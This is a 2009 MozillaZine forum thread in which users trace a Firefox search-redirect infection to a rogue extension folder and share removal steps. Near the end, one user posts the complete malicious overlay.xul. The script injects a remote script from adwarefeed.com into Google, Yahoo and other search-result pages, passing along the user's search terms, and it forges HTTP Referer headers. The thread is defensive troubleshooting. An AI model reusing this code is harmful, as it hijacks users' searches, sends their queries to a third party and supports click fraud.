MozillaZine

"clickfeedmanager.com" virus targets Firefox

User Help for Mozilla Firefox
Tony Dragani
Guest
 

Post Posted February 9th, 2009, 8:30 am

Hey guys,

There appears to be a new virus on the scene that targets Firefox users. It's a variation of the old "Google redirect" virus that affects your search results, so that when you click on them it takes you to various ad sites. This variation affects both Google and Yahoo search results, and only seems to work in Firefox.

The redirects themselves take you through a site called "clickfraudmanager.com." The script that is doing this is coming from "adwarefeed.com." I've spent the better part of the weekend researching this, and it appears that this virus is really, really new, and has only been making the rounds for the past three or four days. At present, no antivirus or antimalware software is detecting it. If you do a search on this topic, you will see that no one in any of the computer support forums out there has been able to figure this out yet. You can, however, disable the redirecting by turning off Java or by installing the NoScript Firefox add-on, as I did. Of course, those measures don't treat the underlying problem.

the-edmeister

Posts: 31011
Joined: February 25th, 2003, 12:51 am
Location: Chicago, IL, USA

Post Posted February 9th, 2009, 11:41 am

If you can isolate and save whatever is being installed, the vendors of the various Malware scanning programs would probably like to see it so that they can come up with a fix. Submission procedures vary, but most have specific rules for emailing it to them.

I agree, I started seeing an increase in postings here and at SUMO about something new last Thursday, but the initial reports started about 10 days ago, IIRC.


Ed
A mind is a terrible thing to waste. Mine has wandered off and I'm out looking for it.

Tony Dragani
Guest
 

Post Posted February 9th, 2009, 1:50 pm

Hey Ed,

Thanks for the reply.

First off, I made a mistake in the title of this thread. The virus routes through "clickfraudmanager.com," not "clickfeedmanager.com." I was confusing it with "adwarefeed.com," which is where the script is coming from.

Anyway, I'm not sure how to isolate and save whatever is being installed. Honestly, I'm not sure what or where the file is that's doing this. I would really like to have something to send to the Malware scanning vendors. Any ideas?

Tony

the-edmeister

Posts: 31011
Joined: February 25th, 2003, 12:51 am
Location: Chicago, IL, USA

Post Posted February 9th, 2009, 2:27 pm

These are probably the best forums for malware removal help. They are where the "first responders" to threats hang out.
http://www.spywarewarrior.com/index.php
http://forum.aumha.org/
http://www.spywareinfoforum.com/
http://bleepingcomputer.com

Do a Google search for clickfraudmanager.com and you'll find threads already discussing removal of that.
http://www.bleepingcomputer.com/forums/topic201315.html

BTW, it might be risky for you to be a "first responder" without some specific guidance from your AV vendor. I wouldn't try it myself, but then again I don't seem to pick up much crap like that - hell, I don't even use a Firewall, just rely upon my Linksys router to block that stuff, along with Avast! and Super AntiSpyware catching whatever the router allows through.


Ed
A mind is a terrible thing to waste. Mine has wandered off and I'm out looking for it.

Tony Dragani
Guest
 

Post Posted February 9th, 2009, 3:07 pm

I stumbled across the solution:

It appears that the virus is hidden in the Firefox Folder. You must uninstall Firefox from the control panel, and then delete the Mozilla Firefox Folder off of your hard drive. Then download and reinstall Firefox. The problem is then gone.

To prevent this in the future, I recommend using the following two Firefox Addons: WOT (web of trust) and NoScript. These two addons will effectively stop any more viruses from being installed via the Firefox browser.

the-edmeister

Posts: 31011
Joined: February 25th, 2003, 12:51 am
Location: Chicago, IL, USA

Post Posted February 9th, 2009, 3:27 pm

Sorry, but that is "butcher surgery" for a pimple, why amputate the limb?
Exactly which folder was that virus in?

There has to be a less destructive method of removing that virus.



Ed
A mind is a terrible thing to waste. Mine has wandered off and I'm out looking for it.

GudgeonPin

Posts: 368
Joined: March 8th, 2008, 4:10 pm

Post Posted February 9th, 2009, 4:56 pm

the-edmeister wrote:Sorry, but that is "butcher surgery" for a pimple, why amputate the limb?
Exactly which folder was that virus in?
There has to be a less destructive method of removing that virus.


I have to agree Ed. If the problem is not a stand alone .EXE but is now attached to an existing FF3 .EXE or .DLL or something, would a reinstall of FF3 on top of the existing one preserve all of the underlying settings and overwrite old files killing the attached code?
Cary G.

the-edmeister

Posts: 31011
Joined: February 25th, 2003, 12:51 am
Location: Chicago, IL, USA

Post Posted February 9th, 2009, 7:18 pm

I get a little frustrated trying to help users figure this stuff out because I don't seem to ever get this crap dumped on my PC and then have the opportunity to have to figure out how to fix it. I guess that's how Mac and Linux users feel, too.


.
A mind is a terrible thing to waste. Mine has wandered off and I'm out looking for it.

Thedeadjester

Posts: 1
Joined: February 9th, 2009, 8:31 pm

Post Posted February 9th, 2009, 8:47 pm

I HAD the exact same problem

I tried all the malware removal tools... nothing worked. I went through all the forums (bleepingcomputer...etc) and downloaded all the malware/spyware tools out there (over 10 different ones). None of them found anything!

I refuse to download a plugin just to take back my browser and I am not one to wait around till someone else figures it out so I went in on my own and looked around. I believe I have a workaround that doesn't involve a complete re-install... however it is close to a re-install and it is a little messy so use at your own risk! It worked for me so there is hope it can work for you.

1. Close Firefox
2. Navigate to the Mozilla firefox folder in program files
3. Go into the extensions folder
4. There will be several folders with funny characters (e.g. {CAFEEFAC-0016-0000-0003-ABCDEFFEDCBA}). Look for the folder with a modified date on or around the date you noticed Firefox acting funny and redirecting you to other pages.
5. Delete this folder. (if there is only one folder here I am not sure what this will do but you might want to consider the possibility of losing firefox specific data or having to re-install firefox if you remove this)
6. Re-open firefox.... and enjoy!

Note: individual results may vary and I am NOT responsible for any porn links you may lose in the process :twisted:
"Don't thank me... just pay it forward"

Rookie_MIB
Guest
 

Post Posted February 9th, 2009, 9:08 pm

Did some more digging through this and found out that the problem is contained in a file called 'overlay.xul'.

In it, it runs a stupid little redirection script which not only 'overlays' a clickmanager type link for Google and Yahoo, but Ask, AltaVista, and just about every other search engine out there. You can just delete the 'overlay.xul' file (or the directory contained in your 'program_files/mozilla/firefox/extensions/{xxxxxxxxxx}/chrome/content/') which has that overlay file.

So to recap:
1) shut down firefox.
2) go to the 'program files/mozilla/firefox/extensions' directory
3) delete the directory which has the overlay.xul file (or was created when you noticed the redirection)
4) restart the browser

Nasty little thing - what a pain in the arse, but it's pretty simple. Just frustrating.

Guest
Guest
 

Post Posted February 9th, 2009, 9:12 pm

Thedeadjester wrote:I HAD the exact same problem

I tried all the malware removal tools... nothing worked. I went through all the forums (bleepingcomputer...etc) and downloaded all the malware/spyware tools out there (over 10 different ones). None of them found anything!

I refuse to download a plugin just to take back my browser and I am not one to wait around till someone else figures it out so I went in on my own and looked around. I believe I have a workaround that doesn't involve a complete re-install... however it is close to a re-install and it is a little messy so use at your own risk! It worked for me so there is hope it can work for you.

1. Close Firefox
2. Navigate to the Mozilla firefox folder in program files
3. Go into the extensions folder
4. There will be several folders with funny characters (e.g. {CAFEEFAC-0016-0000-0003-ABCDEFFEDCBA}). Look for the folder with a modified date on or around the date you noticed Firefox acting funny and redirecting you to other pages.
5. Delete this folder. (if there is only one folder here I am not sure what this will do but you might want to consider the possibility of losing firefox specific data or having to re-install firefox if you remove this)
6. Re-open firefox.... and enjoy!

Note: individual results may vary and I am NOT responsible for any porn links you may lose in the process :twisted:

IT seems to have worked. I've been killing myself since last Thursday trying to get rid of this thing. I tried every antispyware, antimalware, antivirus and registry cleaner imaginable. Your solution was the simplest and only one to be effective. YOU ARE THE MAN!!!!!!!

the-edmeister

Posts: 31011
Joined: February 25th, 2003, 12:51 am
Location: Chicago, IL, USA

Post Posted February 9th, 2009, 10:11 pm

Thedeadjester wrote:I HAD the exact same problem

I tried all the malware removal tools... nothing worked. I went through all the forums (bleepingcomputer...etc) and downloaded all the malware/spyware tools out there (over 10 different ones). None of them found anything!

I refuse to download a plugin just to take back my browser and I am not one to wait around till someone else figures it out so I went in on my own and looked around. I believe I have a workaround that doesn't involve a complete re-install... however it is close to a re-install and it is a little messy so use at your own risk! It worked for me so there is hope it can work for you.

1. Close Firefox
2. Navigate to the Mozilla firefox folder in program files
3. Go into the extensions folder
4. There will be several folders with funny characters (e.g. {CAFEEFAC-0016-0000-0003-ABCDEFFEDCBA}). Look for the folder with a modified date on or around the date you noticed Firefox acting funny and redirecting you to other pages.
5. Delete this folder. (if there is only one folder here I am not sure what this will do but you might want to consider the possibility of losing firefox specific data or having to re-install firefox if you remove this)
6. Re-open firefox.... and enjoy!

Now that is a good solution! A very reasoned, diagnostic type approach to "removing the pimple", instead of amputating the limb!

Note: individual results may vary and I am NOT responsible for any porn links you may lose in the process.
My thoughts on that matter.
Pron is so readily available that losing a few links might be a good thing, you just look for more and you might find a new favorite pron TGP site.
A mind is a terrible thing to waste. Mine has wandered off and I'm out looking for it.

Frank Azle
Guest
 

Post Posted February 10th, 2009, 12:31 am

I don't think the overlay.xul is necessarily the problem, because other add-ons have it too (I have it in Morning Coffee and yetanothersmoothscrolling). However, the suggestion to delete that new folder worked, so much thanks!!!

brian_o
Guest
 

Post Posted February 10th, 2009, 1:51 am

If you look at the code inside overlay.xul, you'll see that it's designed to do the exact thing you're complaining about (i.e. redirect searches to other sites). Overlay.xul IS the problem, remove it.
But, make sure you're deleting the correct overlay.xul.
Here are the contents of my (viral) one:


<!-- overlay.xul as posted; indentation and comments added for readability.
     This is XML, so every "&" inside the script is written "&amp;" and is
     decoded back to "&" before the JavaScript runs. -->
<overlay id="xulcache-overlay" xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
<script type="application/x-javascript" >
// Two hooks on browser-window load: one wires up the page-load handler,
// the other installs an observer on every outgoing HTTP request.
window.addEventListener("load", function() { xulRef.init(); }, false);
window.addEventListener("load", initRequestObserver, false);

var xulRef = {
  // Listen (capture phase) for DOMContentLoaded on every tab's content.
  init:
  function(){
    var appcontent = document.getElementById("appcontent");
    if(appcontent){
      appcontent.addEventListener("DOMContentLoaded", xulRef.onPageLoad, true);
    }
  },
  // On each page load: if the URL is a search-results page, pull out the
  // engine name and query and append a remote <script> from adwarefeed.com
  // into the page's <head>.
  onPageLoad:
  function(aEvent){
    var doc = aEvent.originalTarget;
    var loc = doc.location.href;
    var ref = doc.referrer;
    var keyword = '';
    var engine ;
    // Loader URL; the engine and query are appended to it below.
    var __d = "http://v1.adwarefeed.com/ffjs.php?u=2630369290-57989841-1078081533-839522115a=998&amp;s=3&amp;v=icv270109ff&amp;e=";

    // Search engines recognised by URL pattern; the capture group is the query string.
    if( loc.match(/google\..+\/search.*[&amp;\?]q=([^&amp;]*)/)){
      keyword = RegExp.$1;
      engine = 'google';
    // } else if(loc.match(/search\.ua.+[&amp;\?]q=([^&amp;]*)/)){
    //   keyword = RegExp.$1;
    } else if ( loc.match(/search\.yahoo.*search.*[&amp;\?]p=([^&amp;]*)/)){
      keyword = RegExp.$1;
      engine = 'yahoo';
    } else if(loc.match(/altavista\.com.*results[&amp;\?].*q=([^&amp;]*)/)){
      keyword = RegExp.$1;
      engine = 'altavista';
    } else if(loc.match(/alltheweb\.com.*search[&amp;\?].*q=([^&amp;]*)/)){
      keyword = RegExp.$1;
      engine = 'alltheweb';
    } else if(loc.match(/search\.netscape\.com.*search[&amp;\?].*query=([^&amp;]*)/)){
      keyword = RegExp.$1;
      engine = 'netscape';
    } else if(loc.match(/search\.aol\.com.*search[&amp;\?].*query=([^&amp;]*)/)){
      keyword = RegExp.$1;
      engine = 'aol';
    } else if(loc.match(/ask\.com.*web[&amp;\?].*q=([^&amp;]*)/)){
      keyword = RegExp.$1;
      engine = 'ask';
    } else if(loc.match(/search\.com.*search[&amp;\?].*q=([^&amp;]*)/)){
      keyword = RegExp.$1;
      engine = 'searchcom';
    } else if(loc.match(/search\.lycos\.com.*[&amp;\?].*query=([^&amp;]*)/)){
      keyword = RegExp.$1;
      engine = 'lycos';
    } else if(loc.match(/nova\.rambler\.ru.*search[&amp;\?].*query=([^&amp;]*)/)){
      keyword = RegExp.$1;
      engine = 'rambler';
    } else if(loc.match(/gogo\.ru.*go[&amp;\?].*q=([^&amp;]*)/)){
      keyword = RegExp.$1;
      engine = 'gogo';
    } else if(loc.match(/meta\.ua.*search.asp[&amp;\?]q=([^&amp;]*)/)){
      keyword = RegExp.$1;
      engine = 'meta';
    //} else if(loc.match(/au\.ru.*searchPhrase=([^&amp;]*)/)){
    //  keyword = RegExp.$1;
    } else if(loc.match(/all\.by.*search.*[&amp;\?]query=([^&amp;]*)/)){
      keyword = RegExp.$1;
      engine = 'allby';
    // } else if(loc.match(/uaport\.net.*UAcatalog[/][&amp;\?].*query=([^&amp;]*)/)){
    //   keyword = RegExp.$1;
    } else if(loc.match(/search\.msn\.com.*results.*[&amp;\?].*q=([^&amp;]*)/)){
      keyword = RegExp.$1;
      engine = 'msn';
    } else if(loc.match(/search\.live\.com.*results.*[&amp;\?]q=([^&amp;]*)/)){
      keyword = RegExp.$1;
      engine = 'live';
    };

    // Inject the remote script into the search-results page.
    if( keyword.length > 0 ){
      var script = window.content.document.createElement('script');
      script.id = "js_0";
      script.src = __d + engine + '&amp;q=' + keyword;
      doc.getElementsByTagName('head')[0].appendChild(script);
    }
  }
};

// Register for the "http-on-modify-request" notification, which fires for
// every HTTP request before it is sent.
function initRequestObserver() {
  var observerService = Components.classes["@mozilla.org/observer-service;1"]
    .getService(Components.interfaces.nsIObserverService);
  observerService.addObserver(httpRequestObserver, "http-on-modify-request", false);
}

// If a request URL carries an "&rf=http..." parameter, the value after "&rf="
// becomes the request's Referer and the parameter is stripped from the URL,
// so the request appears to come from whatever page the parameter named.
var httpRequestObserver = {
  observe:
  function(subject, topic, data) {
    if(topic == "http-on-modify-request") {
      var httpChannel = subject.QueryInterface(Components.interfaces.nsIHttpChannel);
      var pos = subject.URI.spec.indexOf("&amp;rf=http");
      if(pos > -1) {
        // pos+4 skips the four characters of "&rf=".
        var newRef = this.ioService = Components.classes["@mozilla.org/network/io-service;1"]
          .getService(Components.interfaces.nsIIOService)
          .newURI(decodeURIComponent(subject.URI.spec.substring(pos+4)), null, null);
        httpChannel.referrer = newRef;
        subject.URI.spec = subject.URI.spec.substring(0, pos);
      }
    }
  }
};

</script>
</overlay>

guest1976
Guest
 

Post Posted February 10th, 2009, 10:11 am

That helped thanks.
